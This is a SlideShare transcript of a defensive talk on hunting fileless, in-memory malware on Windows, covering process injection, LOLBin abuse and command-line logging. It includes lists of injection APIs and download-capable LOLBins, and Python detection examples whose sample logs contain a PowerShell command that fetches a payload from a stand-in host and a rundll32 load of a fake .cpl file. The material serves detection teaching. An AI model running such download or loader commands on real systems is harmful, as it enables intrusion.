– https://github.com/marcosd4h/memhunter
Resources
• Red Canary Presentation
– ATT&CK Deep Dive: Process Injection
• Article on MITRE ATT&CK Sub-Techniques (coming soon)
– https://medium.com/mitre-attack/attack-sub-techniques-
preview-b79ff0ba669a
• DeepInstinct - Process Injection and Manipulation
– https://www.deepinstinct.com/2019/09/15/malware-evasion-
techniques-part-1-process-injection-and-manipulation/
• EndGame – Hunting in Memory
– https://www.slideshare.net/JoeDesimone4/taking-hunting-to-
the-next-level-hunting-in-memory
Resources
LOG-MD.COM
• Websites
– Log-MD.com The tool
– ARTHIR.com Free on GitHub
• The “Windows Logging Cheat Sheet(s)”
– MalwareArchaeology.com
• This presentation and others on SlideShare
– Search for MalwareArchaeology or LOG-MD
Questions?
You can find us at:
• Log-MD.com
• @HackerHurricane
• MalwareArchaeology.com

More Related Content

PDF
Detecting WMI Exploitation v1.1
PDF
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
PDF
Windows IR made easier and faster v1.0
PDF
Logging for Hackers v1.0
PDF
Windows Incident Response is hard, but doesn't have to be
PDF
Commodity malware means YOU
PDF
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
PDF
Logs, Logs, Logs - What you need to know to catch a thief
Detecting WMI Exploitation v1.1
BSidesOK_You_CAN_detect_PowerShell_attacks_v1.1
Windows IR made easier and faster v1.0
Logging for Hackers v1.0
Windows Incident Response is hard, but doesn't have to be
Commodity malware means YOU
MW_Arch Fastest_way_to_hunt_on_Windows_v1.01
Logs, Logs, Logs - What you need to know to catch a thief

What's hot (20)

PDF
Deeplook into apt and how to detect and defend v1.0
PDF
RMISC logging for hackers
PDF
Info sec is not daunting v1.0
PDF
Logging for Hackers - What you need to know to catch them
PDF
Logging for hackers SAINTCON
PDF
InnoTech 2017_Defend_Against_Ransomware 3.0
PDF
You can detect PowerShell attacks
PDF
Ask a Malware Archaeologist
PDF
Finding attacks with these 6 events
PDF
The top 10 windows logs event id's used v1.0
PDF
What can you do about ransomware
PDF
DIR ISF - Email keeps getting us pwned v1.1
PDF
Malware Management - HouSecCon 2014
PDF
Mw arch mac_tips and tricks v1.0
PDF
Secure Yourself, Practice what we preach - BSides Austin 2015
PDF
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
PDF
Sandbox vs manual analysis v2.1
PDF
Proper logging can catch breaches like retail PoS
PDF
Sandbox vs manual malware analysis v1.1
PDF
Windows logging workshop - BSides Austin 2014
Deeplook into apt and how to detect and defend v1.0
RMISC logging for hackers
Info sec is not daunting v1.0
Logging for Hackers - What you need to know to catch them
Logging for hackers SAINTCON
InnoTech 2017_Defend_Against_Ransomware 3.0
You can detect PowerShell attacks
Ask a Malware Archaeologist
Finding attacks with these 6 events
The top 10 windows logs event id's used v1.0
What can you do about ransomware
DIR ISF - Email keeps getting us pwned v1.1
Malware Management - HouSecCon 2014
Mw arch mac_tips and tricks v1.0
Secure Yourself, Practice what we preach - BSides Austin 2015
EDR, ETDR, Next Gen AV is all the rage, so why am I ENRAGED?
Sandbox vs manual analysis v2.1
Proper logging can catch breaches like retail PoS
Sandbox vs manual malware analysis v1.1
Windows logging workshop - BSides Austin 2014
Ad

Similar to You need a PROcess to catch running processes and their modules_v2.0 (20)

PDF
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
PDF
When Security Tools Fail You
PPTX
Defending Your "Gold"
PPTX
Jason Kent - AppSec Without Additional Tools
PDF
Forensics perspective ERFA-møde marts 2017
PDF
Malware collection and analysis
PDF
Malware analysis _ Threat Intelligence Morocco
PPTX
Building next gen malware behavioural analysis environment
PPTX
Introduction to Malware Analysis
PDF
Spo2 t19 spo2-t19
PDF
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
PDF
MITRE AttACK framework it is time you took notice_v1.0
PDF
Super Easy Memory Forensics
 
PDF
EMBA Firmware analysis - TROOPERS22
PDF
Proper logging can catch breaches like retail PoS
PDF
SANS Digital Forensics and Incident Response Poster 2012
PDF
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
PDF
RIoT (Raiding Internet of Things) by Jacob Holcomb
PPTX
Two-For-One Talk: Malware Analysis for Everyone
PPTX
Inventory Tips & Tricks
Can_We_Really_Detect_These_So_Called_Sophisticated_Attacks?
When Security Tools Fail You
Defending Your "Gold"
Jason Kent - AppSec Without Additional Tools
Forensics perspective ERFA-møde marts 2017
Malware collection and analysis
Malware analysis _ Threat Intelligence Morocco
Building next gen malware behavioural analysis environment
Introduction to Malware Analysis
Spo2 t19 spo2-t19
Sophisticated Attacks - Can We Really Detect Them _v1.2.pdf
MITRE AttACK framework it is time you took notice_v1.0
Super Easy Memory Forensics
 
EMBA Firmware analysis - TROOPERS22
Proper logging can catch breaches like retail PoS
SANS Digital Forensics and Incident Response Poster 2012
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
RIoT (Raiding Internet of Things) by Jacob Holcomb
Two-For-One Talk: Malware Analysis for Everyone
Inventory Tips & Tricks
Ad

More from Michael Gough (8)

PDF
Hacking a backup power solution(s) for your home, Tornado tested!
PDF
My InfoSec journey led me to create my own IR tools, how, and why you should too
PPTX
Incident Response Fails
PDF
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
PDF
Cred stealing emails bsides austin_2018 v1.0
PDF
Email keeps getting us pwned - Avoiding Ransomware and malware
PDF
Email keeps getting us pwned v1.1
PDF
Email keeps getting us pwned v1.0
Hacking a backup power solution(s) for your home, Tornado tested!
My InfoSec journey led me to create my own IR tools, how, and why you should too
Incident Response Fails
Introducing ArTHIR - ATT&CK Remote Threat Hunting Incident Response Windows tool
Cred stealing emails bsides austin_2018 v1.0
Email keeps getting us pwned - Avoiding Ransomware and malware
Email keeps getting us pwned v1.1
Email keeps getting us pwned v1.0

Recently uploaded (20)

PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Machine learning based COVID-19 study performance prediction
PPTX
A Presentation on Artificial Intelligence
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PDF
NewMind AI Weekly Chronicles - August'25 Week I
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Network Security Unit 5.pdf for BCA BBA.
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
PDF
Electronic commerce courselecture one. Pdf
DOCX
The AUB Centre for AI in Media Proposal.docx
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Approach and Philosophy of On baking technology
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
Reach Out and Touch Someone: Haptics and Empathic Computing
Encapsulation_ Review paper, used for researhc scholars
Machine learning based COVID-19 study performance prediction
A Presentation on Artificial Intelligence
Per capita expenditure prediction using model stacking based on satellite ima...
Advanced methodologies resolving dimensionality complications for autism neur...
NewMind AI Weekly Chronicles - August'25 Week I
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Review of recent advances in non-invasive hemoglobin estimation
Network Security Unit 5.pdf for BCA BBA.
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
Electronic commerce courselecture one. Pdf
The AUB Centre for AI in Media Proposal.docx
MYSQL Presentation for SQL database connectivity
Approach and Philosophy of On baking technology
Diabetes mellitus diagnosis method based random forest with bat algorithm

You need a PROcess to catch running processes and their modules_v2.0

  • 1. You need a PROcess to check your running processes and modules. The bad guys, and red teams are coming after them! Michael Gough – Principal NCC Group Founder MalwareArchaeology.com & IMFSecurity.com MalwareArchaeology.com
  • 2. Who am I • Blue Team Defender Ninja, Malware Archaeologist, Logoholic and Principal Incident Response Engineer for • I love “properly” configured logs – they tell us Who, What, Where, When and hopefully How Creator of “Windows Logging Cheat Sheet” “Windows File Auditing Cheat Sheet” “Windows Registry Auditing Cheat Sheet” “Windows Splunk Logging Cheat Sheet” “Windows ATT&CK Logging Cheat Sheet” “ARTHIR – ATT&CK Remote Threat Hunting Incident Response tool” • Co-Creator of “Log-MD” – Log Malicious Discovery Tool • And co-host of “THE Incident Response Podcast” MalwareArchaeology.com
  • 4. Because these can’t tell you enough MalwareArchaeology.com
  • 6. Fileless in memory only malware • To address this expanding threat that is becoming more and more common – Too common • Commodity malware, Red Team engagements, and of course APT attackers use it • This method can avoid many security tools MalwareArchaeology.com
  • 7. Let’s rethink or redefine Fileless Malware MalwareArchaeology.com
  • 8. Marketing- Scareware • I get it, saying “Fileless” is an easy way to sum up a threat for management, sales, products, etc. to sum up and understand a new type of threat • But for those of us having to deal with it from an IR or Forensik perspective, we need more than just the word “fileless” • So let’s take a look at another more detailed way to look at fileless malware that immediately tells us something, and how to go about looking for it MalwareArchaeology.com https://conference.forensik.ca/
  • 9. Rethinking Fileless Malware • Fileless Malware that can only be found in the memory of a running system (Malware + Memory = Memware) • No files can be found if you scan the disk while the system is running – Or are very short lived, just long enough to load (bypasses FIM) • Typical infection vectors are: – Injection – Dll side-loading/Hijacking – Process Hollowing – Download source code and compile on the fly, .NET, JSC – User double-click, etc. • “Fileless” malware, the file lives somewhere, so lets do a better job guiding people where to look for signs of it MalwareArchaeology.com
  • 10. Other Fileless Malware types • Regware – Malware payload is stored in the registry with an autorun/ASEP that calls and loads it into memory (Malware + Payload in Registry = RegWare) • WMIware - Malware payload is stored in the WMI database with an autorun/ASEP that calls and loads it into memory (Malware + Payload in WMI database = WMIWare) • PowerShellware - Malware payload is in the form of PowerShell scripts, downloaded or stored somewhere on the fly with an autorun/ASEP that calls and loads it into memory (Malware + Payload in PowerShell = PowerShellWare) • Compileware – Malware payload is not yet compiled, stored anywhere with an autorun/ASEP that calls and loads it into memory (Malware + Payload compiled on the fly = CompileWare) • Downloadware – Autorun/ASEP calls out to the Internet to download malware payload or source code that is then compiled and loads it into memory (Malware + Payload downloaded each time = DownloadWare) maybe LOLBaSWare ;-) MalwareArchaeology.com
  • 11. Autoruns/ASEP • Keep in mind… – Not all malware will have an autorun/ASEP • Latest TrickBot on Domain Controllers • Especially the Red Team, doesn’t like to leave IOCs – Or, the autorun is created on shutdown, then deleted on startup once the malware loads • Nothing found when doing live triage/analysis (Dridex) – So what is in memory may be all that we can see MalwareArchaeology.com
  • 12. Latest TrickBot MalwareArchaeology.com PaloAlto Unit 42 - https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/
  • 13. So how do we find this stuff? MalwareArchaeology.com
  • 14. MITRE ATT&CK • First - Everything you do should be mapped to MITRE ATT&CK - https://attack.mitre.org/ • Some of the techniques used – T1500 – Compile After Delivery – T1127 - Trusted Developer Utilities – T1055 – Process Injection – T1196 – Control Panel Items – etc • Sub-techniques are here !!! MalwareArchaeology.com
  • 15. MITRE ATT&CK – Sub-techniques • T1574 – Hijack Execution Flow • 11 Sub-techniques – 1574.002 - Dll side loading is just one of them • T1055 – Process Injection • 11 Sub-techniques – 1055.002 – Portable Execution Injection MalwareArchaeology.com
  • 16. We need a PROcess • We need to create a PROcess to start looking for this condition • Tools are just not preventing this technique • We need to build this PROcess into our hourly/daily/weekly/monthly routines to detect and alert for this technique • We need to build this PROcess into our daily/weekly/monthly/yearly routines to Threat Hunt for this technique MalwareArchaeology.com Canadian Andrew Hay
  • 17. Two basic ways 1. Dump memory and analyze the memory dump – Use a tool like Volatility and all the plug-ins 2. Check running processes and their modules for signs of additional (DLL) or injected code – Use a tool like LOG-MD-Premium to scan a live system for modifications to running processes and their modules MalwareArchaeology.com
  • 18. Finding Memware • Traditional forensics has us dumping a memory image and running tools like Volatility against it • Logs can contain a lot of details that can alert you to this behavior, IF you collect THEN detect OR hunt – Process command line is KEY to catching these attacks • Checking running processes and their modules on a live system is a GREAT option – Better yet look for signs of injection !! • Look for the other artifacts, autorun/ASEP, registry keys storing scripts and/or payloads, WMI databases storing scripts and/or payloads, and odd PowerShell, large blocks, obfuscation, etc. MalwareArchaeology.com
  • 19. Signs of Injection • What does this look like? • A running process shows signs of additional or replaced code • This condition is detectable by a few tools • And an obvious indicator of bad • Yes, some system drivers will show up here too MalwareArchaeology.com
  • 20. Example LOG-MD-Premium • -proc Check running processes & modules • -md Exclude known good processes UNLESS there is signs of injection • -i List processes with signs of injection • - b9 Static evaluate the file to determine malicious likelihood and dump strings • -vt Lookup the hashes of the modules for any indications of known bad • -x Dump all files that show signs of injection MalwareArchaeology.com
  • 21. Example LOG-MD-Premium B9 module static file evaluation • "B9 Result ":" 'Bad.exe', is likely suspicious • Name":" Bad.exe", • "Size":" 218624", • "MD5":" c4f3974b6eda003b0fa3ac230b24dd49", • "SHA1":" a9a8c1123bb8dc4dbd0ea9635792b7f3c9462e38", • "SHA256":" 7218ad69dfae486e8ceba58d732ff91c0dbfe2615a14ed32e2addcb9aa660157" • "SHA512":" 5ae8c1e2895e794857e6a346cc7a3ca5358718c560b5f0090de35a6cbaeb927fc9cfdfc09ad86a10fb3 414a966485bb68ddcce22103e7e153fef5584527b7538", • "CRC32":" ea619216", • "SSDEEP":" 3072|pQ0n3fFiFjwk5vl8E5cYkx9psaiNcJNuyJZfb5N/z4n6feAg0FujGV8umEmDP0|/MFswtDqdOamiN udAOlymz", • "PDB Path":" ", • "VSInfo":" 1", • "Entropy":" 6.576878", • "FilePacker":" No matches found.", • "Imphash":" 2f0d6f69089f07b10ab46e6a615c6fd4", • "Certificates":" None found.", • "B9 Result ":" 'Bad.exe', is likely suspicious.“ MalwareArchaeology.com
• 22. Examples
• Kovter injects into SvcHost 32bit
• Qakbot
• Dridex
• 23. Dumping/Extracting Files
• If you use a tool to extract or dump files from memory to disk, you can statically evaluate them
• Look up the hashes in an API like VirusTotal
• Evaluate the makeup of the file to determine Good, Suspicious, or Malicious indicators
• Extract Strings
• Reverse the files if needed
• 24. Dumping/Extracting Files
• You can use a memdump and Volatility to extract files, DLLs, and Drivers
– --dump-dir=VolatilityFiles
– --dump-dir=VolatilityDlls
– --dump-dir=VolatilityDrivers
• You can use LOG-MD-Premium to extract files
– LOG-MD-Premium -proc -md -i -x
• 25. Extracted Files LOG-MD & Volatility
• QakBot
• Kovter
• Dridex
• Evaluated with LOG-MD B9 module
• 26. Details of the files
• You can look for simple indicators
• Is it signed?
• MetaData - Actual filename vs Internal and Original filename
• Is it packed?
• Hash lookups to an API
• File upload to an API
• Determine the makeup of the file for Likely “Good”, “Suspicious”, or “Malicious”
• 27. Downloadware Examples
• They can call out to the Internet to download the code to compile, or fetch the malware so it does not live on disk. Some examples:
– CobaltStrike and Scythe custom malware packages
– LoLBins/LoLBas – Rundll32, Regsvr32, Regasm, etc.
• https://github.com/LOLBAS-Project/LOLBAS
– Compilers - Csc.exe, MSBuild.exe, JSC.exe, etc.
– May write to disk on shutdown, delete on startup
• 28. CSC.exe example
• <random.cs>
• <random.cmdline>
• Csc.exe /noconfig /fullpaths @
https://blog.didierstevens.com/2019/10/15/powershell-add-type-csc-exe/
• 29. Why Running Processes
• SPEED
• It is a far faster and more scalable option to scan a system LIVE for running processes and their modules
• Dumping memory takes time
• Determining the Imageinfo takes a LONG time
• Running all the plugins takes time
• 30. Control Panel Applets
• .CPL files are all those Control Panel applets
– Rundll32 C:\<whateverdir>\Fakejava.cpl
• Launches a bad DLL into memory - LOLBIN
• .cpl files load all the time, so it’s noisy
• 3rd party applets are not well signed
• Many EDRs do not alert on this method
• The Red Team LOVES this method - CobaltStrike
• 31. Control Panel Applets
• This is probably the #1 Red Team attack method
– LOLBin (Control.exe and RunDll32.exe)
• HARD to detect due to normal noise
• EDR is poor at this method
• So how do you catch this highly used and successful method?
• 32. Catching Control Panel Applets
• Logging executions (4688)
• Look for .cpl files and/or Control.exe and/or RunDll32.exe
• Baseline what is normal
• Create a PROcess
• Paths will be the same as normal
• Statically analyze these .cpl files, whatever the extension
• 33. LOLBin/LOLBaS
• Oddvar Moe - https://lolbas-project.github.io/
• Listen to our podcast on the subject
• 34. NIX PRO Tip
• It is easy for NIX rootkits to hide things
• But there is a /proc directory
• Which is also easy to hide stuff from: with ll or ls -l you don’t see a hidden /proc dir
• If we know what belongs in each /proc/<pid>, then we can look for the execution line (/proc/<pid>/exe)
– Record the PIDs that ls can see:
– ls -al /proc | awk '{print $9}' | sort -n > proc-list.txt
– Probe every PID directly and list the exe link of any that ls did not show:
– for i in {1..40000}; do if test -d /proc/$i; then if ! grep -q "^$i$" proc-list.txt; then ls -al /proc/$i/exe; fi; fi; done | grep "root" | grep -v -f known_good_proc.txt > odd_proc.txt
• 36. Monitor for & Threat Hunting
• We need to develop a PROcess to monitor/detect for and/or Threat Hunt for signs of these techniques
• Step 1 – Enable the data (enable the logging)
– Configure logs per the Windows Logging Cheat Sheet(s)
– Enable collection of ‘Process Command Line’
• Step 2 – Create detections for many of these techniques
– Process command line is KEY.. It’s in the parameters
• 37. Monitor for & Threat Hunting Step 3
• Come up with a PROcess to scan Running Processes and their loaded Modules
– Detect these memory only infections
– This should be both for regular detection and for Threat Hunting
– Watch for indications of injection
• 38. Static eval files for Strings
• You can eval files for known strings that may indicate injection
• The LOG-MD-Premium B9 module not only looks at the structure of the file to determine likely “Good”, “Suspicious”, or “Malware”
• But also dumps strings to allow eval of the existence of strings that further indicate the file is malicious
• 39. Example LOG-MD-Premium B9 static file evaluation - Strings
"B9Words": "List of words in file.",
"!This program cannot be run in DOS mode."
"JtRich"
".text"
"`.rdata"
"@.data"
".gfids"
"GetProcessHeap"
"FindClose"
"FindFirstFileExA"
"FindNextFileA"
"IsValidCodePage"
"GetCommandLineA"
"GetCommandLineW"
"GetEnvironmentStringsW"
"FreeEnvironmentStringsW"
"SetStdHandle"
"WriteConsoleW"
"ReadConsoleW"
"CreateFileW"
"HeapSize"
"SetEndOfFile"
"_CorDllMain"
"mscoree.dll"
"Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED."
"string too long"
"invalid string position"
"bad allocation"
"identifier removed"
"illegal byte sequence"
"interrupted"
"invalid argument"
"io error"
"is a directory"
"message size"
"network down"
"network reset"
"network unreachable"
"no buffer space"
"no child process"
"no link"
"no lock available"
"no message available"
"no message"
"no protocol option"
"no space on device"
"no stream resources"
"no such device or address"
"no such device"
"no such file or directory"
"no such process"
"not a directory"
"not a socket"
"not a stream"
"not connected"
"not enough memory"
• 40. Monitor for & Threat Hunting Strings
• Maybe a PROcess to scan strings for API calls such as:
– OpenProcess
– VirtualAlloc
– VirtualAllocEx
– WriteProcessMemory
– LoadLibrary
– LoadLibraryA
– CreateRemoteThread
– ResumeThread
– ReflectiveLoader()
– GetProcAddress
– CreateProcess
– ZwUnMapViewOfSection
– NtUnmapViewOfSection
– GetThreadContext
– SetThreadContext
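The strings scan from slides 38 to 40 as an added example (not LOG-MD's B9 code): it pulls printable ASCII and UTF-16LE runs out of a file, counts exact matches of the API names listed above, and gives a Likely Good / Review / Suspicious verdict. The co-occurrence rule, the three labels and the constructed sample blob are assumptions made for this example.

```python
import re
from typing import Dict, List

# Injection-related API names from slide 40, deduplicated. "ReflectiveLoader()"
# is matched without the parentheses, since import/export names carry none.
INJECTION_APIS = (
    "OpenProcess", "VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory",
    "LoadLibrary", "LoadLibraryA", "CreateRemoteThread", "ResumeThread",
    "ReflectiveLoader", "GetProcAddress", "CreateProcess",
    "ZwUnmapViewOfSection", "NtUnmapViewOfSection", "GetThreadContext", "SetThreadContext",
)
# API pairs that together describe an injection or hollowing chain. This is a
# rule assumed for the example, not LOG-MD's B9 scoring.
INJECTION_CHAINS = (
    ("WriteProcessMemory", "CreateRemoteThread"),
    ("WriteProcessMemory", "SetThreadContext"),
    ("NtUnmapViewOfSection", "ResumeThread"),
    ("ZwUnmapViewOfSection", "ResumeThread"),
)
_ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")         # printable ASCII runs
_WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")  # UTF-16LE runs

def extract_strings(data: bytes) -> List[str]:
    """Mimic `strings`: printable ASCII and UTF-16LE runs of 4+ characters.
    Windows binaries often store text as UTF-16LE, which an ASCII-only scan misses."""
    ascii_runs = [m.group().decode("ascii") for m in _ASCII_RE.finditer(data)]
    wide_runs = [m.group().decode("utf-16-le") for m in _WIDE_RE.finditer(data)]
    return ascii_runs + wide_runs

def injection_indicators(strings: List[str]) -> Dict[str, int]:
    """Count exact matches of the watched API names. Import names are exact,
    so 'OpenProcessToken' is deliberately not counted as 'OpenProcess'."""
    hits: Dict[str, int] = {}
    for s in strings:
        if s in INJECTION_APIS:
            hits[s] = hits.get(s, 0) + 1
    return hits

def classify(data: bytes) -> str:
    """'Likely Good', 'Review' or 'Suspicious', based on which indicators co-occur."""
    hits = injection_indicators(extract_strings(data))
    if "ReflectiveLoader" in hits or any(a in hits and b in hits for a, b in INJECTION_CHAINS):
        return "Suspicious"
    return "Review" if hits else "Likely Good"

# Constructed PE-like blob (not a real sample): DOS stub text, import names, one wide
# string. The extra \x00 before the wide string keeps the UTF-16 scan from gluing the
# trailing "s\x00" of GetProcAddress onto it (a real-world alignment pitfall).
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8 + b"!This program cannot be run in DOS mode.\x00"
    + b"kernel32.dll\x00OpenProcess\x00VirtualAllocEx\x00WriteProcessMemory\x00"
    + b"CreateRemoteThread\x00GetProcAddress\x00\x00"
    + "ReflectiveLoader".encode("utf-16-le") + b"\x00\x00\x01\x02\x03"
)
```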
• 41. Watch for Downloading LOLBin/LOLBaS
• Malicious code has to be downloaded
• Advanced attackers and Red Teams will use the LOLBin and Scripts LOLBaS to download the payload
• Alert on these
• Baseline the normal, there will NOT be many
• Watch these executions closely
• 42. LOLBINS/LOLBAS that can download
• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe
• Excel too !!!
Short list per Cisco Talos:
• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe
https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html
Process Command Line is KEY
Map to MITRE ATT&CK
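A detection pass over 4688 process-creation records that covers both the .cpl check from slide 32 and the LOLBin download watch from slides 41 and 42, as an added example (not LOG-MD or any tool from the deck). The pipe-delimited record layout, the System32 baseline directory, the rule names and the sample records are assumptions constructed for this example.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# LOLBins the deck lists as able to download (slide 42), as lower-case basenames.
DOWNLOAD_LOLBINS = {
    "powershell.exe", "bitsadmin.exe", "certutil.exe", "psexec.exe", "wmic.exe",
    "mshta.exe", "mofcomp.exe", "cmstp.exe", "windbg.exe", "cdb.exe",
    "msbuild.exe", "csc.exe", "regsvr32.exe", "excel.exe",
}
CPL_LOADERS = {"rundll32.exe", "control.exe"}
# Directories where .cpl applets normally live (assumed baseline; build your own from 4688 data).
BASELINE_CPL_DIRS = ("c:\\windows\\system32\\",)
_URL_RE = re.compile(r"https?://", re.IGNORECASE)
_CPL_RE = re.compile(r"(\S+\.cpl)\b", re.IGNORECASE)

# Constructed records, not real logs: EventID|NewProcessName|ParentProcessName|CommandLine
SAMPLE_4688 = [
    r"4688|C:\Windows\System32\rundll32.exe|C:\Windows\explorer.exe|rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl",
    r"4688|C:\Windows\System32\rundll32.exe|C:\Users\alice\AppData\Local\Temp\setup.exe|rundll32.exe C:\Users\alice\AppData\Local\Temp\Fakejava.cpl",
    r'4688|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\cmd.exe|powershell.exe -c "Invoke-WebRequest http://example.invalid/stage.bin -OutFile C:\Users\alice\AppData\Local\Temp\stage.bin"',
    r"4688|C:\Windows\System32\svchost.exe|C:\Windows\System32\services.exe|svchost.exe -k netsvcs",
    r"4688|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe -c Get-Date",
]

def parse_4688(line: str) -> Dict[str, str]:
    """Split one record; maxsplit=3 keeps any '|' that appears inside the command line."""
    event_id, new_proc, parent, cmdline = line.split("|", 3)
    return {"id": event_id, "process": new_proc, "parent": parent, "cmdline": cmdline}

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules this event trips; an empty list means nothing odd."""
    exe = ntpath.basename(ev["process"]).lower()
    cmd = ev["cmdline"]
    rules = []
    if exe in CPL_LOADERS:  # slide 32: .cpl loaded via rundll32/control.exe, path vs baseline
        for m in _CPL_RE.finditer(cmd):
            if not m.group(1).strip('"').lower().startswith(BASELINE_CPL_DIRS):
                rules.append("cpl-outside-baseline")
    if exe in DOWNLOAD_LOLBINS and _URL_RE.search(cmd):  # slides 41-42: downloader plus a URL
        rules.append("lolbin-url-in-cmdline")
    return rules

def hunt(lines: List[str]) -> List[Tuple[str, str]]:
    """Run every 4688 record through the rules and return (rule, command line) pairs."""
    findings = []
    for ev in (parse_4688(line) for line in lines):
        if ev["id"] == "4688":
            findings.extend((rule, ev["cmdline"]) for rule in check_event(ev))
    return findings
```

The baseline applet launched from System32 and the PowerShell call without a URL produce nothing; only the applet loaded from a user Temp directory and the downloader with a URL in its command line are returned.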
• 43. NIX LOLBins - GTFObins
• https://gtfobins.github.io/
• 44. Best options for PROcess tools
• Log Management is your BEST friend here
– If you have, and can afford to put, agents on all your endpoints and collect the needed data
• If not, then you will need a PROcess to manually check running processes, their modules and signs of injection
• LOG-MD-Premium, Sysinternals, Sysmon (ID 8 & 10), using WinRM and ARTHIR, or a memory dump with Volatility are possible options
• 46. Conclusion
• Create a PROcess to look at running processes and their modules
• Look for signs of injection
• Log the process command line execution
• Watch the LOLBaS utilities
• Monitor for the executions discussed in this presentation
• 47. Some tools to consider (Please let me know of any others)
• LOG-MD-Premium
– Running Process and Modules, Injection, and B9 static file analysis
• Volatility
– https://www.volatilityfoundation.org/
– HollowFind Plugin (Win 10 compatible?)
• https://github.com/monnappa22/HollowFind
• PESieve (Opensource)
– https://github.com/hasherezade/pe-sieve
• Get-InjectedThread.ps1
– https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
• PSReflect
– https://github.com/mattifestation/PSReflect
• 48. Some tools to consider (Please let me know of any others)
• GRR
– https://github.com/google/grr
• Rekall
– http://www.rekall-forensic.com/home
• InVtero
– https://github.com/ShaneK2/inVtero.net
– https://github.com/seancomeau/inVtero.net
• MemHunter (Old, requires .NET 3.5)
– https://github.com/marcosd4h/memhunter
• 49. Resources
• Red Canary Presentation
– ATT&CK Deep Dive: Process Injection
• Article on MITRE ATT&CK Sub-Techniques (coming soon)
– https://medium.com/mitre-attack/attack-sub-techniques-preview-b79ff0ba669a
• DeepInstinct - Process Injection and Manipulation
– https://www.deepinstinct.com/2019/09/15/malware-evasion-techniques-part-1-process-injection-and-manipulation/
• EndGame – Hunting in Memory
– https://www.slideshare.net/JoeDesimone4/taking-hunting-to-the-next-level-hunting-in-memory
• 50. Resources LOG-MD.COM
• Websites
– Log-MD.com The tool
– ARTHIR.com Free on GitHub
• The “Windows Logging Cheat Sheet(s)”
– MalwareArchaeology.com
• This presentation and others on SlideShare
– Search for MalwareArchaeology or LOG-MD
• 51. Questions?
You can find us at:
• Log-MD.com
• @HackerHurricane
• MalwareArchaeology.com